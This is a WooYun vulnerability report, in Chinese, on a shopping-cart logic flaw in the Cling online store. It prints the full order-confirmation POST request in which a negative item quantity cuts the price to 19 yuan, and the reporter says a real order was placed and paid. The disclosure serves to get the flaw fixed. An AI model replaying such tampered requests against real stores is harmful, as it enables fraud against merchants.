当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0161610

漏洞标题:Cling翰临科技在线商店逻辑缺陷可导致低价购买手表手环~

相关厂商:海翰临科技

漏洞作者: 路人甲

提交时间:2015-12-18 17:08

修复时间:2016-01-28 17:10

公开时间:2016-01-28 17:10

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:8

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-28: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Cling翰临科技在线商店逻辑缺陷可导致低价购买手表手环,支持心率的哦~~

详细说明:

http://store.hicling.com/


购买商品加入购物车后,可抓包修改商品数量,只需要修改数量,总价什么的会自动在服务器计算。

修改商品数量.png


我购买了一个1198的手环+一个79的充电座+(-10)个128的腕带,还有22的运费,共计1198+79+(-10)*28+22=19元,成功提交订单并付款。
购物车确认时提交POST的内容如下:

POST /order/confirm HTTP/1.1
Host: store.hicling.com
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
Origin: http://store.hicling.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9
Referer: http://store.hicling.com/Order/Address
Cookie: xxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 3147
OrderAmount=3&OrderItems=[
    {
        "Id": 1,
        "ProductId": 80009,
        "Title": "{\"zhcn\":\"Cling 红枫\",\"enus\":\"Cling Maple\"}",
        "EnCode": "maple",
        "Image": "http://file.hicling.com/pictures/sys/others/7c759c74a15a435c984936dee0b2e6ee_c_200x200.png",
        "Color": null,
        "ColorValue": null,
        "Number": "200-0023",
        "Count": 1,
        "Stock": 87,
        "Price": "{\"zhcn\": \"1198.00\",\"enus\":\"1198.00\"}",
        "MarketPrice": "{\"zhcn\": \"1198.00\",\"enus\":\"1198.00\"}",
        "ExpressFee": 10,
        "Size": " ",
        "BuyWay": null
    },
    {
        "Id": 2,
        "ProductId": 80001,
        "Title": "{\"zhcn\":\"缤纷腕带(单品)\",\"enus\":\"Color Wristband\"}",
        "EnCode": "strap",
        "Image": "http://file.hicling.com/pictures/sys/others/f80a44416d874b31b92434f077aacf47_c_200x200.jpg",
        "Color": "{'zhcn':'本色黑','enus':'黑'}",
        "ColorValue": "#000000",
        "Number": "200-0011",
        "Count": -10,
        "Stock": 465,
        "Price": "{\"zhcn\": \"128.00\",\"enus\":\"128.00\"}",
        "MarketPrice": "{\"zhcn\": \"128.00\",\"enus\":\"128.00\"}",
        "ExpressFee": 10,
        "Size": " ",
        "BuyWay": null
    },
    {
        "Id": 3,
        "ProductId": 80003,
        "Title": "{\"zhcn\":\"Cling 便携充电座\",\"enus\":\"Cling Charger\"}",
        "EnCode": "cling_charger",
        "Image": "http://file.hicling.com/pictures/sys/others/e027ce6898574d57a5349cfde92e57f0_c_200x200.jpg",
        "Color": null,
        "ColorValue": null,
        "Number": "200-0022",
        "Count": 1,
        "Stock": 444,
        "Price": "{\"zhcn\": \"79.00\",\"enus\":\"79.00\"}",
        "MarketPrice": "{\"zhcn\": \"79.00\",\"enus\":\"79.00\"}",
        "ExpressFee": 10,
        "Size": " ",
        "BuyWay": null
    }
]&OrderTotalPrice=1405.00&OrderUserId=5098662&AddressId=13486&OrderAddress={
    "Id": xxx,
    "UserId": xxxx,
    "Location": "CN",
    "Province": "xx",
    "City": "xxx",
    "District": "xxxx",
    "PostCode": "xxx",
    "Address": "xxxx",
    "ReciverName": "levin",
    "PhoneNumber": "13812341234",
    "TelPhone": "",
    "NoticeEmail": null,
    "IsDefault": 1
}&AddressCity=xxx&AddressProvince=xxxx&AddressDistrict=xxx


只需要修改商品数量就可以了,价格啥的提交后会自动变的~~
嘿嘿,订单已经提交了,,钱我都付了,,你们不会不发货吧~~

漏洞证明:

修改并发包后,返回的确认内容如下:

屏幕快照 2015-12-15 下午8.07.12.png


成功付款截图:

屏幕快照 2015-12-15 下午8.08.55.png

修复方案:

所以参数都要做校验,,我还没测试其他参数,,不过你们开发的肯定是所以参数都应该在服务器端校验的,,

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝